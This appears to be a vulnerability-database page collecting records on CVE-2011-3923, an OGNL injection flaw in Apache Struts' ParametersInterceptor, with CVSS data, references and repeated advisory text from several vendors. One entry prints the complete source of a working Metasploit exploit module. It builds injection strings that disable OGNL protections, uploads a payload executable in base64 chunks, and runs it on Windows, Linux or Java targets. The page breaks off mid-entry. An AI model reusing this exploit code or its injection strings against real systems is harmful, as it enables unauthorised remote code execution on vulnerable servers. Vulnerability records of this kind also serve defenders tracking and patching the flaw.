Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux

2012-04-07T00:00:00

Description

Apache-Struts2 / OpenSymphony-Xwork RCE Vulnerability Type: Remote Command Execution

{"id": "E-192", "type": "dsquare", "bulletinFamily": "exploit", "title": "Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "published": "2012-04-07T00:00:00", "modified": "2013-10-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "Dsquare Security", "references": ["https://vulners.com/NID/NID:57850", "https://vulners.com/BID/BID:51628", "https://vulners.com/OSVDB/OSVDB:78501"], "cvelist": ["CVE-2011-3923"], "immutableFields": [], "lastseen": "2021-07-28T14:33:45", "viewCount": 7, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2012-217"]}, {"type": "cve", "idList": ["CVE-2011-3923"]}, {"type": "d2", "idList": ["D2SEC_STRUTS3"]}, {"type": "dsquare", "idList": ["E-145"]}, {"type": "exploitdb", "idList": ["EDB-ID:24874", "EDB-ID:34062"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4BC3373D8B033302B0D62E73E77241B4"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS_CODE_EXEC_PARAMETERS-"]}, {"type": "nessus", "idList": ["STRUTS_2_3_1_1_REAL.NASL", "STRUTS_2_3_1_2.NASL", "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE2.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120908"]}, {"type": "saint", "idList": ["SAINT:0CCA475F6630BE4984AD5BCD73F36787", "SAINT:31608BA12D1F5812460F891E4273B72E", "SAINT:511A133D013C1E633049D41B65A3E1CE", "SAINT:C61233DE6385A49E0B3B5C50B0E99EF4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31277"]}, {"type": "seebug", "idList": ["SSV:78561"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3923"]}, {"type": "zdt", "idList": ["1337DAY-ID-20544"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-3923"]}, {"type": "d2", "idList": ["D2SEC_STRUTS3"]}, {"type": "dsquare", "idList": ["E-145"]}, {"type": "exploitdb", "idList": ["EDB-ID:34062"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_PARAMETERS"]}, {"type": "nessus", "idList": ["STRUTS_2_3_1_1_REAL.NASL"]}, {"type": "saint", "idList": ["SAINT:C61233DE6385A49E0B3B5C50B0E99EF4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31277"]}]}, "exploitation": null, "vulnersScore": 0.8}, "sourceData": "For the exploit source code contact DSquare Security sales team.", "_state": {"dependencies": 1660012827, "score": 1660013489}, "_internal": {"score_hash": "87a66c75c5a34b835e456c41726cb3ba"}}

{"zdt": [{"lastseen": "2018-04-14T13:53:08", "description": "This Metasploit module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter.", "cvss3": {}, "published": "2013-03-22T00:00:00", "type": "zdt", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2013-03-22T00:00:00", "id": "1337DAY-ID-20544", "href": "https://0day.today/exploit/description/20544", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command execution vulnerability in Apache Struts\r\n versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows\r\n for the use of parentheses which in turn allows it to interpret parameter values as\r\n OGNL expressions during certain exception handling for mismatched data types of\r\n properties which allows remote attackers to execute arbitrary Java code via a\r\n crafted parameter.\r\n },\r\n 'Author' =>\r\n [\r\n 'Meder Kydyraliev', # Vulnerability Discovery and PoC\r\n 'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module\r\n 'mihi' #ARCH_JAVA support\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-3923'],\r\n [ 'OSVDB', '78501'],\r\n [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']\r\n ],\r\n 'Platform' => [ 'win', 'linux', 'java'],\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n ['Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'windows'\r\n }\r\n ],\r\n ['Linux Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ],\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Oct 01 2011',\r\n 'DefaultTarget' => 2))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]),\r\n OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])\r\n ], self.class)\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n inject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\"\r\n inject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\"\r\n inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))\r\n inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))\r\n uri = String.new(datastore['TARGETURI'])\r\n uri = normalize_uri(uri)\r\n uri.gsub!(/INJECT/,inject) # append the injection string\r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'version' => '1.1',\r\n 'method' => 'GET',\r\n })\r\n return resp #Used for check function.\r\n end\r\n\r\n def exploit\r\n #Set up generic values.\r\n @payload_exe = rand_text_alphanumeric(4+rand(4))\r\n pl_exe = generate_payload_exe\r\n append = 'false'\r\n #Now arch specific...\r\n case target['Platform']\r\n when 'linux'\r\n @payload_exe = \"/tmp/#{@payload_exe}\"\r\n chmod_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n exec_cmd = \"@[email\u00a0protected]().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\"\r\n when 'java'\r\n @payload_exe << \".jar\"\r\n pl_exe = payload.encoded_jar.pack\r\n exec_cmd = \"\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,true),\"\r\n exec_cmd << \"#[email\u00a0protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\"\r\n exec_cmd << \"#q.setAccessible(true),#q.set(null,false),\"\r\n exec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\"\r\n exec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\"\r\n exec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')}).invoke(\"\r\n exec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\"\r\n when 'windows'\r\n @payload_exe = \"./#{@payload_exe}.exe\"\r\n exec_cmd = \"@[email\u00a0protected]().exec('#{@payload_exe}')\"\r\n else\r\n fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')\r\n end\r\n\r\n #Now with all the arch specific stuff set, perform the upload.\r\n #109 = length of command string plus the max length of append.\r\n sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length\r\n chunk_length = 2048 - sub_from_chunk\r\n chunk_length = ((chunk_length/4).floor)*3\r\n while pl_exe.length > chunk_length\r\n java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)\r\n pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]\r\n append = true\r\n end\r\n java_upload_part(pl_exe,@payload_exe,append)\r\n execute_command(chmod_cmd) if target['Platform'] == 'linux'\r\n execute_command(exec_cmd)\r\n register_files_for_cleanup(@payload_exe)\r\n end\r\n\r\n def java_upload_part(part, filename, append = 'false')\r\n cmd = \"\"\r\n cmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\"\r\n cmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\"\r\n cmd << \"#f.close()\"\r\n execute_command(cmd)\r\n end\r\n\r\n def check\r\n sleep_time = datastore['CHECK_SLEEPTIME']\r\n check_cmd = \"@[email\u00a0protected](#{sleep_time * 1000})\"\r\n t1 = Time.now\r\n print_status(\"Asking remote server to sleep for #{sleep_time} seconds\")\r\n response = execute_command(check_cmd)\r\n t2 = Time.now\r\n delta = t2 - t1\r\n\r\n\r\n if response.nil?\r\n return Exploit::CheckCode::Safe\r\n elsif delta < sleep_time\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Appears\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/20544", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2023-01-09T05:06:08", "description": "Regular expression in ParametersInterceptor matches top['foo'](0) as a valid expression, which OGNL treats as (top['foo'])(0) and evaluates the value of 'foo' action parameter as an OGNL expression. This lets malicious users put arbitrary OGNL statements into any String variable exposed by an action and have it evaluated as an OGNL expression and since OGNL statement is in HTTP parameter value attacker can use blacklisted characters (e.g. #) to disable method execution and execute arbitrary methods, bypassing the ParametersInterceptor and OGNL library protections.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T00:24:08", "type": "github", "title": "ParameterInterceptor vulnerability allows remote command execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2023-01-09T05:01:16", "id": "GHSA-J68F-8H6P-9H5Q", "href": "https://github.com/advisories/GHSA-j68f-8h6p-9h5q", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-01-10T06:46:52", "description": "Regular expression in ParametersInterceptor matches top['foo'](0) as a valid expression, which OGNL treats as (top['foo'])(0) and evaluates the value of 'foo' action parameter as an OGNL expression. This lets malicious users put arbitrary OGNL statements into any String variable exposed by an action and have it evaluated as an OGNL expression and since OGNL statement is in HTTP parameter value attacker can use blacklisted characters (e.g. #) to disable method execution and execute arbitrary methods, bypassing the ParametersInterceptor and OGNL library protections.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T00:24:08", "type": "osv", "title": "ParameterInterceptor vulnerability allows remote command execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2023-01-10T06:46:50", "id": "OSV:GHSA-J68F-8H6P-9H5Q", "href": "https://osv.dev/vulnerability/GHSA-j68f-8h6p-9h5q", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2022-01-26T11:35:59", "description": "Added: 03/26/2012 \nCVE: [CVE-2011-3923](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923>) \nBID: [51628](<http://www.securityfocus.com/bid/51628>) \nOSVDB: [78109](<http://www.osvdb.org/78109>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.1.2 allow OGNL expressions to be evaluated via parentheses. The ParametersInterceptor class is responsible for passing user-supplied parameters to the application stack. Because ParametersInterceptor does not filter parentheses, it is possible for a user to supply OGNL expressions inside Parentheses, which could result in the execution of arbitrary system commands. \n\n### Resolution\n\nUpgrade to [Struts 2.3.1.2](<http://struts.apache.org/download.cgi#struts2312>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/s2-008.html> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2012-03-26T00:00:00", "type": "saint", "title": "Apache Struts 2 ParametersInterceptor OGNL Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2012-03-26T00:00:00", "id": "SAINT:C61233DE6385A49E0B3B5C50B0E99EF4", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_parametersinterceptor", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-10-03T15:01:53", "description": "Added: 03/26/2012 \nCVE: [CVE-2011-3923](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923>) \nBID: [51628](<http://www.securityfocus.com/bid/51628>) \nOSVDB: [78109](<http://www.osvdb.org/78109>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.1.2 allow OGNL expressions to be evaluated via parentheses. The ParametersInterceptor class is responsible for passing user-supplied parameters to the application stack. Because ParametersInterceptor does not filter parentheses, it is possible for a user to supply OGNL expressions inside Parentheses, which could result in the execution of arbitrary system commands. \n\n### Resolution\n\nUpgrade to [Struts 2.3.1.2](<http://struts.apache.org/download.cgi#struts2312>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/s2-008.html> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-03-26T00:00:00", "type": "saint", "title": "Apache Struts 2 ParametersInterceptor OGNL Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2012-03-26T00:00:00", "id": "SAINT:511A133D013C1E633049D41B65A3E1CE", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_parametersinterceptor", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-29T16:40:19", "description": "Added: 03/26/2012 \nCVE: [CVE-2011-3923](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923>) \nBID: [51628](<http://www.securityfocus.com/bid/51628>) \nOSVDB: [78109](<http://www.osvdb.org/78109>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.1.2 allow OGNL expressions to be evaluated via parentheses. The ParametersInterceptor class is responsible for passing user-supplied parameters to the application stack. Because ParametersInterceptor does not filter parentheses, it is possible for a user to supply OGNL expressions inside Parentheses, which could result in the execution of arbitrary system commands. \n\n### Resolution\n\nUpgrade to [Struts 2.3.1.2](<http://struts.apache.org/download.cgi#struts2312>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/s2-008.html> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2012-03-26T00:00:00", "type": "saint", "title": "Apache Struts 2 ParametersInterceptor OGNL Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2012-03-26T00:00:00", "id": "SAINT:0CCA475F6630BE4984AD5BCD73F36787", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_parametersinterceptor", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:33", "description": "Added: 03/26/2012 \nCVE: [CVE-2011-3923](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923>) \nBID: [51628](<http://www.securityfocus.com/bid/51628>) \nOSVDB: [78109](<http://www.osvdb.org/78109>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.1.2 allow OGNL expressions to be evaluated via parentheses. The ParametersInterceptor class is responsible for passing user-supplied parameters to the application stack. Because ParametersInterceptor does not filter parentheses, it is possible for a user to supply OGNL expressions inside Parentheses, which could result in the execution of arbitrary system commands. \n\n### Resolution\n\nUpgrade to [Struts 2.3.1.2](<http://struts.apache.org/download.cgi#struts2312>) or later. \n\n### References\n\n<http://struts.apache.org/2.x/docs/s2-008.html> \n<https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThe executable `smbclient` must be available on the exploit server, and a valid SMB user with permission to write to the SMB share is required. The smb password is not allowed to contain single quotes ('). \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2012-03-26T00:00:00", "type": "saint", "title": "Apache Struts 2 ParametersInterceptor OGNL Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2012-03-26T00:00:00", "id": "SAINT:31608BA12D1F5812460F891E4273B72E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_parametersinterceptor", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:11:40", "description": "A command execution vulnerability has been reported in Apache Struts 2.", "cvss3": {}, "published": "2012-05-14T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 ParametersInterceptor OGNL Command Execution (CVE-2011-3923)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-217", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:35:53", "description": "Apache Struts before 2.3.1.2 allows remote attackers to bypass security\nprotections in the ParameterInterceptor class and execute arbitrary\ncommands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "ubuntucve", "title": "CVE-2011-3923", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2019-11-01T00:00:00", "id": "UB:CVE-2011-3923", "href": "https://ubuntu.com/security/CVE-2011-3923", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2012-04-07T00:00:00", "type": "dsquare", "title": "Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Windows", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3923"], "modified": "2013-04-02T00:00:00", "id": "E-145", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "d2": [{"lastseen": "2021-07-28T14:32:20", "description": "**Name**| 